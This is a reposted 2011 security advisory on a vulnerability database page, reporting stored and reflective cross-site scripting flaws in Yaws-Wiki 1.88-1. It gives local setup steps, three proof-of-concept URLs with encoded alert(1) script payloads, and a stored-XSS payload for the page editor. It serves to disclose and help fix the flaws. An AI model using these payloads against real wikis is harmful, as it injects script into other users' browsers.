Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26059
HistoryApr 05, 2011 - 12:00 a.m.

Stored and Reflective XSS in Yaws-Wiki 1.88-1 (Erlang)

2011-04-0500:00:00
vulners.com
65
JSON

Software: yaws-wiki
version affected: 1.88-1
platform: Erlang
homepage:http://yaws.hyber.org/
Researcher: Michael Brooks
Original Advisory:https://sitewat.ch/en/Advisory/4

Install instructions for Ubuntu:
sudo apt-get install yaws-wiki

Edit:/etc/yaws/conf.d/yaws-wiki.conf
#add this:
<server wiki>
port = 8181
listen = 0.0.0.0
docroot = /var/lib/yaws-wiki
</server>

Then restart yaws:
sudo /etc/init.d/yaws restart

Reflective XSS:
http://localhost:8181/editTag.yaws?node=ALockedPage&amp;tag=&#37;3E&#37;3C/pre&#37;3E&#37;3CScRiPt&#37;3Ealert&#40;1&#41;&#37;3C/ScRiPt&#37;3E
http://localhost:8181/showOldPage.yaws?node=home&amp;index=&#37;3E&#37;3C/pre&#37;3E&#37;3CScRiPt&#37;3Ealert&#40;1&#41;&#37;3C/ScRiPt&#37;3E
http://localhost:8181/allRefsToMe.yaws?node=&#37;3E&#37;3C/pre&#37;3E&#37;3CScRiPt&#37;3Ealert&#40;1&#41;&#37;3C/ScRiPt&#37;3E

Stored XSS:
http://localhost:8181/editPage.yaws?node=home

The large textbox on the editPage.yaws page is vulnerable to xss. This is the"text" post variable:
<script>alert(1)</script>

JSON